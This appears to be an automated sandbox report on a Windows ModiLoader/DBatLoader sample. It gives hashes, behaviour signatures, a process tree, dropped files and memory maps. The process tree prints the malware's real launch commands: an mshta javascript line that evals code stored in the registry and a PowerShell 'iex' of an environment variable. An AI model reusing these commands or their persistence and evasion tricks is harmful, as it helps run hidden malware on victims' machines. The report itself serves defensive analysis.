Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    04-05-2024 08:26

General

  • Target

    11e27faa8cf80aa4d6b08e31845211ff_JaffaCakes118.exe

  • Size

    265KB

  • MD5

    11e27faa8cf80aa4d6b08e31845211ff

  • SHA1

    8e2706830d2f3d04f66746a342a5920a1ca04d76

  • SHA256

    a49fa2fd171c274cfcdf1275eeee73052ac43e233951fdd84a1e2f9a8db57614

  • SHA512

    c026e87bb28c505a37f41614f2d03690d3b7ff7c986483bb4f4aafe75cd9d466f4759080eebe4006fe6d6424b6fb2214c2a70c48f86b43f6f3f1263cfae8614e

  • SSDEEP

    6144:veX94nYY+uUMFemOFu3Ksm2Yn+EE9j+ivEyPYxJQeH:OSnYPweZnl+EER+iv6IeH

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
  • Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
  • ModiLoader Second Stage 59 IoCs
  • Looks for VMWare Tools registry key 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Drops startup file 1 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry class 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 31 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\11e27faa8cf80aa4d6b08e31845211ff_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\11e27faa8cf80aa4d6b08e31845211ff_JaffaCakes118.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2856
    • C:\Users\Admin\AppData\Local\Temp\11e27faa8cf80aa4d6b08e31845211ff_JaffaCakes118.exe
      "C:\Users\Admin\AppData\Local\Temp\11e27faa8cf80aa4d6b08e31845211ff_JaffaCakes118.exe"
      2⤵
        PID:2820
    • C:\Windows\system32\mshta.exe
      "C:\Windows\system32\mshta.exe" javascript:fTMkICz02="KJH";q2Z2=new%20ActiveXObject("WScript.Shell");iQ52hSU="eO";UuY82n=q2Z2.RegRead("HKLM\\software\\Wow6432Node\\0HNGvqG\\uRVsRh");Kf1gAyM="M3Bs1gPW";eval(UuY82n);N4DE8v="C";
      1⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2544
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:gqsp
        2⤵
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1972
        • C:\Windows\SysWOW64\regsvr32.exe
          regsvr32.exe
          3⤵
          • Looks for VirtualBox Guest Additions in registry
          • Looks for VirtualBox drivers on disk
          • Looks for VMWare Tools registry key
          • Checks BIOS information in registry
          • Deletes itself
          • Drops startup file
          • Adds Run key to start application
          • Maps connected drives based on registry
          • Suspicious use of SetThreadContext
          • Modifies Internet Explorer settings
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:2156
          • C:\Windows\SysWOW64\regsvr32.exe
            "C:\Windows\SysWOW64\regsvr32.exe"
            4⤵
              PID:1176

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\d3afae00\52d5d4d8.73caeeca8

        Filesize

        25KB

        MD5

        1c22f4412dd3f7741dae7b79ae8895d2

        SHA1

        e4dc8792c2e2d61260f36483de74a36f6560b669

        SHA256

        237194b26426c690be3a630dfcfd81cd53a41630a131308e748b47674e1e403d

        SHA512

        dda72964884e71f251753046b5c67764a7cb6fbd3f5a344316e4030203e9d1c84a2dc3bb5fb251663d884106e9ff1505c7f3b1f1a1d4bee4f5f8f0a262fe4a1c

      • C:\Users\Admin\AppData\Local\d3afae00\9a86c6c3.lnk

        Filesize

        897B

        MD5

        b5a308dbaa0f4ae2ba712c72979b0e4f

        SHA1

        ea6270ac97809e3388adb25eca2b7a0f68ad8c55

        SHA256

        07df68df30334d44408ad1fa3e94d759270bdc1b17a9b494aa59dd43605e9482

        SHA512

        3e3ff80778838b0078b8dc4bc7fb60b6d1cf374f8cda491b2d32805650d5c1a61f026bad431f326d116b73cc2c5fce36871811a5e9cedcabf3c0d5305b7f612d

      • C:\Users\Admin\AppData\Local\d3afae00\d2239679.bat

        Filesize

        67B

        MD5

        f2ae417dcfcbe11a00d1102e6b587247

        SHA1

        0078bd4798af0b8a717425f1a85a1ff2a70c4c37

        SHA256

        0dc66bcd192c0da909958e43407fb9c4eb212c0471e715e32555f9399549255b

        SHA512

        8fd8d7af58ce744f505ec537830104bab71f86e87f7184bb6f0b699c8eed5f68ffd97211c435771b76aae94c8a74f782b656923c0f61f7189349b744d76f7dea

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\e795bdc5.lnk

        Filesize

        999B

        MD5

        d6891377644b9dade40d05709cfffd78

        SHA1

        ce2ea83ec89887753e40da3a5bede59b16f7b747

        SHA256

        4e5f6bc7bd7163394d29bd76b1b2656cfa8372c53a1d9a58ccf39f419e50e601

        SHA512

        9510eefa9b344e2538c62688c9b866f5b617934408d8395450edec71b00ac7be09f817ad7d7f61d23c1912cca01e0d1dae3a139bdfe1755f4149e01bbf76ccd7

      • C:\Users\Admin\AppData\Roaming\e00a3efa\fe73a489.73caeeca8

        Filesize

        41KB

        MD5

        281f7199a0402dbe5e6c7a1bfe6c6c52

        SHA1

        a75cb62a9e7d66852f2ff727700f712324616c87

        SHA256

        4414d7e248aaeefe3a00e0e3d585e78ff8509391b1448b913d6a27a8d601e502

        SHA512

        4fa8f59d085d12bf24e26ba44df90b2993269ef1a8a600c6a0c383552a0590592f78d59c370628c84eae1db2595e4b25776a9385309a0d80b4b404be9bf9d7f1

      • memory/1176-73-0x00000000002D0000-0x0000000000411000-memory.dmp

        Filesize

        1.3MB

      • memory/1176-71-0x00000000002D0000-0x0000000000411000-memory.dmp

        Filesize

        1.3MB

      • memory/1176-80-0x00000000002D0000-0x0000000000411000-memory.dmp

        Filesize

        1.3MB

      • memory/1176-68-0x00000000002D0000-0x0000000000411000-memory.dmp

        Filesize

        1.3MB

      • memory/1176-69-0x00000000002D0000-0x0000000000411000-memory.dmp

        Filesize

        1.3MB

      • memory/1176-67-0x00000000002D0000-0x0000000000411000-memory.dmp

        Filesize

        1.3MB

      • memory/1176-70-0x00000000002D0000-0x0000000000411000-memory.dmp

        Filesize

        1.3MB

      • memory/1176-77-0x00000000002D0000-0x0000000000411000-memory.dmp

        Filesize

        1.3MB

      • memory/1176-72-0x00000000002D0000-0x0000000000411000-memory.dmp

        Filesize

        1.3MB

      • memory/1176-81-0x00000000002D0000-0x0000000000411000-memory.dmp

        Filesize

        1.3MB

      • memory/1176-79-0x00000000002D0000-0x0000000000411000-memory.dmp

        Filesize

        1.3MB

      • memory/1176-74-0x00000000002D0000-0x0000000000411000-memory.dmp

        Filesize

        1.3MB

      • memory/1176-75-0x00000000002D0000-0x0000000000411000-memory.dmp

        Filesize

        1.3MB

      • memory/1176-76-0x00000000002D0000-0x0000000000411000-memory.dmp

        Filesize

        1.3MB

      • memory/1176-78-0x00000000002D0000-0x0000000000411000-memory.dmp

        Filesize

        1.3MB

      • memory/1972-21-0x0000000006160000-0x0000000006236000-memory.dmp

        Filesize

        856KB

      • memory/1972-24-0x0000000002F70000-0x0000000004F70000-memory.dmp

        Filesize

        32.0MB

      • memory/1972-26-0x0000000006160000-0x0000000006236000-memory.dmp

        Filesize

        856KB

      • memory/2156-29-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-30-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-59-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-57-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-56-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-55-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-54-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-44-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-43-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-42-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-41-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-40-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-66-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-38-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-37-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-36-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-35-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-34-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-33-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-32-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-31-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-49-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-58-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-45-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-48-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-47-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-46-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-39-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-23-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-28-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-27-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2156-25-0x00000000001D0000-0x0000000000311000-memory.dmp

        Filesize

        1.3MB

      • memory/2820-2-0x0000000000400000-0x000000000043A000-memory.dmp

        Filesize

        232KB

      • memory/2820-12-0x0000000001C80000-0x0000000001D56000-memory.dmp

        Filesize

        856KB

      • memory/2820-11-0x0000000001C80000-0x0000000001D56000-memory.dmp

        Filesize

        856KB

      • memory/2820-8-0x0000000001C80000-0x0000000001D56000-memory.dmp

        Filesize

        856KB

      • memory/2820-10-0x0000000001C80000-0x0000000001D56000-memory.dmp

        Filesize

        856KB

      • memory/2820-9-0x0000000001C80000-0x0000000001D56000-memory.dmp

        Filesize

        856KB

      • memory/2820-7-0x0000000001C80000-0x0000000001D56000-memory.dmp

        Filesize

        856KB

      • memory/2820-6-0x0000000001C80000-0x0000000001D56000-memory.dmp

        Filesize

        856KB

      • memory/2820-5-0x0000000000400000-0x000000000043A000-memory.dmp

        Filesize

        232KB

      • memory/2820-4-0x0000000000400000-0x000000000043A000-memory.dmp

        Filesize

        232KB